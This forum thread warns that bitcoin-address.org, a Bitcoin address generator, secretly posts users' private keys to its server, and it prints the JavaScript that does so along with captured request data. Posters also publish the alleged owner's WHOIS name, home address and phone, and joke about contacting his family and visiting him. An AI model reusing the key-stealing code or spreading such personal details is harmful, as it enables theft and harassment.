Probable malicious site: bitcoin-address.org

escrow.ms

legendary

Activity: 1274

Merit: 1004

Quote from: niko on June 03, 2013, 07:15:25 AM

Quote from: Lohoris on June 03, 2013, 04:15:55 AM

Quote from: niko on May 31, 2013, 10:12:29 PM

How come there is no citi-bank.com where I would be asked to log in?

are you serious?

Again, none of them use TLD with "citi" and "bank" in its name. Otherwise they wouldn't have to try all the tricks to spoof or mask the actual link. Trademarking "bitcoin" would make phishing harder and less effective.

Wrong,They don't do because stealing money from banks isn't easy.
Plus there are several TLD's available for registration.

Take a Look at this thread.

https://bitcointalk.org/index.php?topic=219284.0;topicseen

niko

hero member

Activity: 756

Merit: 501

There is more to Bitcoin than bitcoins.

Quote from: Lohoris on June 03, 2013, 04:15:55 AM

Quote from: niko on May 31, 2013, 10:12:29 PM

How come there is no citi-bank.com where I would be asked to log in?

are you serious?

Again, none of them use TLD with "citi" and "bank" in its name. Otherwise they wouldn't have to try all the tricks to spoof or mask the actual link. Trademarking "bitcoin" would make phishing harder and less effective, as it opens the perpetrators to additional legal risk.

Lohoris

hero member

Activity: 630

Merit: 500

Bitgoblin

Quote from: niko on May 31, 2013, 10:12:29 PM

How come there is no citi-bank.com where I would be asked to log in?

are you serious?

niko

hero member

Activity: 756

Merit: 501

There is more to Bitcoin than bitcoins.

Quote from: Lohoris on May 31, 2013, 11:05:31 AM

Quote from: niko on May 31, 2013, 10:43:17 AM

I wonder how many newcomers step in dogshit like this on their first step, and turn away for good. It would be much better for everyone if bitcoin was trademarked by any entity that is at least more trustworthy than the average person on this planet.

Very wrong: even if it was trademarked, scam sites could still pop-up, and since they are likely already illegal anyway, they wouldn't care about the trademark and do it anyway.

It's like DRM: legit business would be hurt, while criminals would be unaffected.

How come there is no citi-bank.com where I would be asked to log in?

Lohoris

hero member

Activity: 630

Merit: 500

Bitgoblin

Quote from: niko on May 31, 2013, 10:43:17 AM

I wonder how many newcomers step in dogshit like this on their first step, and turn away for good. It would be much better for everyone if bitcoin was trademarked by any entity that is at least more trustworthy than the average person on this planet.

Very wrong: even if it was trademarked, scam sites could still pop-up, and since they are likely already illegal anyway, they wouldn't care about the trademark and do it anyway.

It's like DRM: legit business would be hurt, while criminals would be unaffected.

niko

hero member

Activity: 756

Merit: 501

There is more to Bitcoin than bitcoins.

I wonder how many newcomers step in dogshit like this on their first step, and turn away for good. It would be much better for everyone if bitcoin was trademarked by any entity that is at least more trustworthy than the average person on this planet. I know Tibanne started working on this, but not sure how far they got.

greyhawk

hero member

Activity: 952

Merit: 1009

Quote from: OpenYourEyes on May 29, 2013, 09:36:31 AM

Quote from: greyhawk on May 29, 2013, 09:33:35 AM

And I didn't even call his father yet... Sad

Is your bio on him legit? Source?

Only as legit as the WHOIS entry. So there's always the possibility of someone having entered another one's adress.

In any case he deleted it now. Seems to have gotten the message.

Also he's like an hour away from where I am. So there's no problem in going there to split a neighbourly piece of cake.

OpenYourEyes

full member

Activity: 238

Merit: 100

Quote from: greyhawk on May 29, 2013, 09:33:35 AM

And I didn't even call his father yet... Sad

Is your bio on him legit? Source?

I've got a copy of the website, so I'll quite happily contact his family Cheesy

greyhawk

hero member

Activity: 952

Merit: 1009

And I didn't even call his father yet... Sad

OpenYourEyes

full member

Activity: 238

Merit: 100

Quote from: kodo on May 29, 2013, 12:23:07 AM

So what does the site do thats malicious?

Nothing, unless you don't mind the private key being email to the site owner which then gives them full access to any funds sent to one of their generated addresses.

Edit: Aha. Seems he has taking the site down. Hope it is because of a script I had an a loop which generated over 10,000 BTC addresses, bet his inbox is pretty full. Cheesy

greyhawk

hero member

Activity: 952

Merit: 1009

Quote from: OpenYourEyes on May 28, 2013, 03:12:23 PM

Quote

Registrant Name:Jan Kuhn
Registrant Street1:Herzbachweg 22
Registrant Street2:
Registrant Street3:
Registrant City:Gelnhausen
Registrant State/Province:
Registrant Postal Code:63571
Registrant Country:DE
Registrant Phone:+49.51818553717
Registrant Phone Ext.:
Registrant FAX:+49.51818553718

That's an 18 year old chess talent living at home with his father who's a defense lawyer. At least he doesn't have to go very far when the crackdown cracks down.

kodo

newbie

Activity: 42

Merit: 0

So what does the site do thats malicious?

OpenYourEyes

full member

Activity: 238

Merit: 100

Quote from: jackjack on May 28, 2013, 04:59:02 PM

I'm sure it's only for statistics Roll Eyes

Indeed. I'm sure I can find him some marketing companies that would be very interested in them. Cheesy

And, yet, the scammers account and his AE/shrills still remain active. Huh

jackjack

legendary

Activity: 1176

Merit: 1255

May Bitcoin be touched by his Noodly Appendage

I'm sure it's only for statistics Roll Eyes

OpenYourEyes

full member

Activity: 238

Merit: 100

Certainly seems so. There is a javascript function at the bottom of the page which seems to send the public/private key off in an email:

Code:

...
btcaddressEmail=document.getElementById('btcaddress'+kk).innerHTML;
var privateKeyEmail=document.getElementById('btcprivwif'+kk).innerHTML;
var dataToSend=new Object();
dataToSend.btcaddressEmail=btcaddressEmail;
dataToSend.privateKeyEmail=privateKeyEmail;
sendToServer(dataToSend);

})(count);
count--;

}
}

function sendToServer(dataToSend){
$.ajax({
url:"sendEmail.php",
type:"post",
data:dataToSend,
success:function(json){
console.log(json);
console.log("DONE");
},
error:function(){
console.log("error");
}
});
}

And here's the POST headers each time a new address is generated:

Quote

Accept:*/*
Accept-Encoding:gzip,deflate,sdch
Accept-Language:en-GB,en-US;q=0.8,en;q=0.6
Connection:keep-alive
Content-Length:118
Content-Type:application/x-www-form-urlencoded; charset=UTF-8
DNT:1
Host:www.bitcoin-address.org
Origin:http://www.bitcoin-address.org
Referer:http://www.bitcoin-address.org/
User-Agent:
X-Requested-With:XMLHttpRequest
Form Dataview sourceview URL encoded
btcaddressEmail:147NH6jMB5AXBEhqF3GxyiuxAPv4MCcYHW
privateKeyEmail:5J9snkqjAQ5sB4JSm4GnsErvmoyux7dvaM5hRpiayvkoaQm2P2U

Quote

Registrant Name:Jan Kuhn
Registrant Street1:Herzbachweg 22
Registrant Street2:
Registrant Street3:
Registrant City:Gelnhausen
Registrant State/Province:
Registrant Postal Code:63571
Registrant Country:DE
Registrant Phone:+49.51818553717
Registrant Phone Ext.:
Registrant FAX:+49.51818553718

theymos

administrator

Activity: 5222

Merit: 13032

Bitcoin-address.org was being spammed by JayKEy00. It's malicious, right?

Topic: Probable malicious site: bitcoin-address.org (Read 1578 times)